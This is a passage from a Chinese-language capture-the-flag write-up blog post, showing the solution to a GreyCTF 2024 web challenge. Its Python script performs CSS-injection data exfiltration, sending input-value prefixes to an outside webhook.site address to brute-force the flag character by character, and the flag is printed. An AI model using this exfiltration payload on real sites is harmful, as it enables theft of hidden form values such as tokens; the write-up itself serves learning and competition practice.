class="string">&quot;0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZf&#125;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> arr:</span><br><span class="line">    payload=<span class="string">&quot;grey&#123;X5S34RCH1fY0UC4NF1ND1T&#125;&quot;</span>+i</span><br><span class="line">    <span class="built_in">print</span>(payload)</span><br><span class="line">    data = &#123;</span><br><span class="line">        <span class="string">&quot;css_value&quot;</span>: <span class="string">&#x27;input[value^=&quot;&#x27;</span>+payload+<span class="string">&#x27;&quot;]&#123;background:url(https://webhook.site/886c0266-b6f5-4dc0-ae07-a9565f6b907a/&#x27;</span>+payload+<span class="string">&#x27;);&#125;&#x27;</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">print</span>(data)</span><br><span class="line">    url = <span class="string">&quot;http://challs.nusgreyhats.org:33339/submit&quot;</span></span><br><span class="line"></span><br><span class="line">    response = requests.post(url, headers=headers, data=data)</span><br><span class="line">    <span class="keyword">if</span> response.status_code == <span class="number">200</span>:</span><br><span class="line">        soup = BeautifulSoup(response.text, <span class="string">&#x27;html.parser&#x27;</span>)</span><br><span class="line">        <span class="comment"># 查找&lt;form&gt;标签中的action属性值</span></span><br><span class="line">        form_action = soup.find(<span class="string">&#x27;form&#x27;</span>).get(<span class="string">&#x27;action&#x27;</span>)</span><br><span class="line">        judge_url = <span class="string">&#x27;http://challs.nusgreyhats.org:33339&#x27;</span> + form_action</span><br><span class="line">        judge_headers = &#123;</span><br><span class="line">            <span class="string">&#x27;Host&#x27;</span>: <span class="string">&#x27;challs.nusgreyhats.org:33339&#x27;</span>,</span><br><span class="line">            <span class="string">&#x27;Content-Type&#x27;</span>: <span class="string">&#x27;application/x-www-form-urlencoded&#x27;</span>,</span><br><span class="line">            <span class="string">&#x27;User-Agent&#x27;</span>: <span class="string">&#x27;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36&#x27;</span>,</span><br><span class="line">            <span class="string">&#x27;Accept-Encoding&#x27;</span>: <span class="string">&#x27;gzip, deflate&#x27;</span>,</span><br><span class="line">            <span class="string">&#x27;Accept-Language&#x27;</span>: <span class="string">&#x27;zh-CN,zh;q=0.9&#x27;</span>,</span><br><span class="line">            <span class="string">&#x27;Connection&#x27;</span>: <span class="string">&#x27;close&#x27;</span></span><br><span class="line">        &#125;</span><br><span class="line">        judge_data = &#123;&#125;</span><br><span class="line">        judge_response = requests.post(judge_url, headers=judge_headers, data=judge_data)</span><br><span class="line">        </span><br><span class="line">        <span class="keyword">if</span> judge_response.status_code == <span class="number">200</span>:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;Judge request successful.&quot;</span>)</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;judge request. Status code:&quot;</span>, judge_response.status_code)</span><br><span class="line">            <span class="built_in">print</span>(judge_response.text)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;Failed to retrieve form action URL. Status code:&quot;</span>, response.status_code)</span><br></pre></td></tr></table></figure>

<p>每循环完一次，就检查接收站哪个收到了信息，然后添加到<code>payload</code>里进行下一次的爆破</p>
<p>得到flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grey&#123;X5S34RCH1fY0UC4NF1ND1T&#125;</span><br></pre></td></tr></table></figure>


  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/oSthing">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Markdown-Parser-114-solves-100-points"><span class="toc-number">1.</span> <span class="toc-text">Markdown Parser(114 solves &#x2F; 100 points)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Greyctf-Survey-154-solves-100-points"><span class="toc-number">2.</span> <span class="toc-text">Greyctf Survey(154 solves &#x2F; 100 points)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Baby-Web-183-solves-100-points"><span class="toc-number">3.</span> <span class="toc-text">Baby Web(183 solves &#x2F; 100 points)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Beautiful-Styles-70-solves-100-points"><span class="toc-number">4.</span> <span class="toc-text">Beautiful Styles(70 solves &#x2F; 100 points)</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/07/14/graycatCTF2024-wp/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/07/14/graycatCTF2024-wp/&text=graycatCTF2024 wp"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/07/14/graycatCTF2024-wp/&title=graycatCTF2024 wp"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/07/14/graycatCTF2024-wp/&is_video=false&description=graycatCTF2024 wp"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=graycatCTF2024 wp&body=Check out this article: http://example.com/2024/07/14/graycatCTF2024-wp/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/07/14/graycatCTF2024-wp/&title=graycatCTF2024 wp"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/07/14/graycatCTF2024-wp/&title=graycatCTF2024 wp"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/07/14/graycatCTF2024-wp/&title=graycatCTF2024 wp"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/07/14/graycatCTF2024-wp/&title=graycatCTF2024 wp"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/07/14/graycatCTF2024-wp/&name=graycatCTF2024 wp&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/07/14/graycatCTF2024-wp/&t=graycatCTF2024 wp"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2024
    oSthing
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/oSthing">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
